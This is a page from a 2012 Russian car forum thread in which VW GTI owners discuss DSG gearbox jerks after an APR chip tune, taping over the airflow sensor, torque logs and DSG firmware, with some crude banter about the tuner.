+ Ответить в теме
Страница 4 из 12 ПерваяПервая ... 2 3 4 5 6 ... ПоследняяПоследняя
Показано с 31 по 40 из 112

Тема: Пинки в DSG после чип тюнинга APR

GTI-Racing KorupZZioner is on a distinguished road Аватар для KorupZZioner
    Машина
    GTI 5 DSG full EXHAUST 2-4 APR
    Всё правильно про возросшую нагрузку и то как её видит DSG по кану. Я это и пытаюсь донести до Михаила (в начале поста). И изолента на расходомер это один из способов снизить расчитываемую нагрузку моторным.Так сказать обман DSG. Но мне же говорят что мы умные , а ты тут проблемму какой то изолентой пытаешься решить. И ведь толчки идут именно в диапазоне 2500 оборотов при максимально возможном моменте для этих оборотов. И здесь дело не в железе это точно.

Добавлено через 1 час 6 минут
    Сейчас посмотрел максимальный момент в логе с DSG. 300н.м При чём он идёт уже начиная с 2400 об.мин если разгонять на 4 с тапкой в пол в гору.

Добавлено через 1 час 21 минуту
    У стандартного гольфа идёт 280 н.м в стоке. Т.е чип апр для полного выхлопа под 95 бензин даёт прирост в 20 н.м и 30 л.с примерно.Маловато конечно. Я вот думаю может залить чип под 98 и интейк. И при этом интейк не ставить. Кто нить так делал ????
    Последний раз редактировалось KorupZZioner; 11.09.2012 в 10:42. Причина: Добавлено сообщение

GTI-Racing turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold Аватар для turborabbit
    Машина
    MKVI GTi 475hp
    И изолента на расходомер это один из способов снизить расчитываемую нагрузку моторным.
    ====
    ОК.
    Во первых, расходомер это не единственный датчик для пересчёта нагрузки в МЕД9 мозгах. Скажу больше - в описываемых вами режимах показания расходомера - вторичны.

Далее, давайте вспомним что меряет расходомер.
    Он меряет скорость потока и параметры для вычисления плотности.
    А потом, зная сечение колбы уже выдаёт граммы в секунду (килограммы в час).
    Так вот, изолента уменьшит сечение колбы. Т.е. скорость потока возрастёт. И расходомер будет "видеть" больше граммов. Т.е. нагрузка не упадёт, а возрастёт.

Ну и наконец.
    На прилагаемых ниже фоточках корчик о шестиста лошадках.
    Диаметр впуска 100мм.
    Изначально был опробован "фильтр нулевого сопротивления" (ну чтобы камешки не засасывало) из двух слоёв металлической сетки :
    http://img.osudim.org/155/ibi-3071-009.jpg

Но турбина эту сеточку засасывала на ура.
    Пришлось проапгрейдить и добавить ещё одну, жесткую алюминиевую сетку, которую стелят на пол.
    http://img.osudim.org/155/ibi-3071-021.jpg
    http://img.osudim.org/155/ibiza_explained.jpg

А теперь представим что будет с изолентой, даже делая скидку на то, что лошадок 250 а не 600, но не забывая учитывать что диаметр не 100мм, а 60мм.

Безумству храбрых поём мы песню (ц)
    Запомните и "зарубите на носу" : 2.0TFSI+K03 = max300hp 2.0TSI+IHI = max315hp 2.0T(F)SI+K04 = max400hp :)

Машина
    Цитата Сообщение от valj Посмотреть сообщение
    Кирилл, а несут ли подобные защитные сбросы сцепления ДСГ при переключениях вред для коробки? АПР утвеждают, что никакая перепрошивка ДСГ не нужна для корректной работы их прошивок
    Я так скажу. Есть такая процедура как програмирование блоков управления. Эта процедура в оригинале делается с помощью VAS.... в ведомых функциях. Проводится она онлайн сейчас. И прошивка DSG под едишен 35 отличается от прошивки под 200 л.с гольф. И релизы этих прошивок постоянно меняются. До 2008 года их было 3 если мне память не изменяет.

GTI-Racing turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold turborabbit is a splendid one to behold Аватар для turborabbit
    Машина
    MKVI GTi 475hp
    Цитата Сообщение от valj Посмотреть сообщение
    Кирилл, а несут ли подобные защитные сбросы сцепления ДСГ при переключениях вред для коробки? АПР утвеждают, что никакая перепрошивка ДСГ не нужна для корректной работы их прошивок
    ====
    СБРОС сцепы (отключение коробки от двигателя) это аварийный режим.
    Он наоборот НЕ ДОПУСКАЕТ худших развитий ситуации.
    А вот "блонда резко бросила сцепу" это прямое попадалово на баблос в скором времени.
    Если АПРы утверждают то так оно и должно быть. И так оно и было пока АПРы лили лайтовые консервы. Но АПРы нарушили правило номер один консервных заводов - "создать 10 расово православных, сильных и ярких демокаров и под этот шумок продать 10.000 лайтовых консерв сняв обильный урожай брюквы с хомячков". Они начали "гонку вооружений". Прослушав, наверное, то самое совещание Андрея нашего Барабанцева

Володин, б***ь, который вашим спецам, сорокалетним пердунам, объясняет, где датчики в мотор-листе! (глухой удар по столу)
    Б***ь, парню двадцать пять лет! Вы сами понимаете, что вы нули перед ним, б***ь? Так вы хоть позорьтесь, сю… хоть приходи?те сюда, молчите, б***ь, слушайте, что вам говорят, и выдавайте вовремя!
    (ц)
    Запомните и "зарубите на носу" : 2.0TFSI+K03 = max300hp 2.0TSI+IHI = max315hp 2.0T(F)SI+K04 = max400hp :)

Машина
    Миша уехал оказывается в Америку. По этому Apr пока в теме не часто...... Турборабит, вы не поняли что я изолентой прикрыл. Я снизил наоборот поток воздуха. До изоленты 192 примерно , с изолентой более 185 я с него не увидел. Тут я сделал всё грамотно. И в дсг при этом момент в логе упал до 290 н.м. И рывки сразу прошли. Я не понял , что за последняя цитата )))
    Последний раз редактировалось KorupZZioner; 11.09.2012 в 12:10.

Машина
    MKVI GTi 475hp
    Цитата Сообщение от KorupZZioner Посмотреть сообщение
    Миша уехал оказывается в Америку.
    ====
    За новой партией корнеплода для хомяков ?

Добавлено через 9 минут
    Турборабит, вы не поняли что я изолентой прикрыл. Я снизил наоборот поток воздуха. До изоленты 192 примерно , с изолентой более 185 я с него не увидел. Тут я сделал всё грамотно. И в дсг при этом момент в логе упал до 290 н.м. И рывки сразу прошли.
    ====
    Безумству храбрых поём мы песню.
    Ну если изолента помогла, можно придумать деревянный рестриктор на впуск. И не мучать АПР такими мелочами :)
    Последний раз редактировалось turborabbit; 11.09.2012 в 11:49. Причина: Добавлено сообщение

Машина
    Я смотрю у вас Рабит с АПром практически супружеские отношения ))) А вам не влом практически в каждом посту где присутствует разговор с АПРом выливать негатив в их адресс ? Если честно то это не хорошо. Я думаю разговор должен вестись исключительно в деловом русле, а не "корнеплоды","хомячки" и т.д. Словесный понос удел слабых и баб....

Машина
    MKVI GTi 475hp
    Я смотрю у вас Рабит с АПром практически супружеские отношения ))) А вам не влом практически в каждом посту где присутствует разговор с АПРом выливать негатив в их адресс ? Если честно то это не хорошо. Я думаю разговор должен вестись исключительно в деловом русле, а не "корнеплоды","хомячки" и т.д. Словесный понос удел слабых и баб....
    ====
    Неа, мне на в лом.
    И пофиг хорошо это или нет. "Хорошо" - вообще понятие относительное.
    А конструктива я насыпал чуть более чем достаточно.
    Насчёт хомячков и брюквы - просто называю вещи своими именами. Один из приёмов высказать то что думаешь, но без мата.
    Насчёт "слабых и баб" - опять же пофиг. Из серии "опять в интернете кто-то не прав".

Машина
    Ну за конструктив спасибо....

GTI-Racing Serzh will become famous soon enough Serzh will become famous soon enough Аватар для Serzh
    Машина
    A4 Allroad

Добавлено через 1 час 21 минуту
    У стандартного гольфа идёт 280 н.м в стоке. Т.е чип апр для полного выхлопа под 95 бензин даёт прирост в 20 н.м и 30 л.с примерно.Маловато конечно. Я вот думаю может залить чип под 98 и интейк. И при этом интейк не ставить. Кто нить так делал ????
    У меня стоит чип Stage2 + под 95 и 98, но нет впуска, (выпуск и интеркулер)
    MKV GTI APR Stage 2 - продан ((
    AUDI A4 allroad
    МB E280 4 MATIC - продан

+ Ответить в теме
Страница 4 из 12 ПерваяПервая ... 2 3 4 5 6 ... ПоследняяПоследняя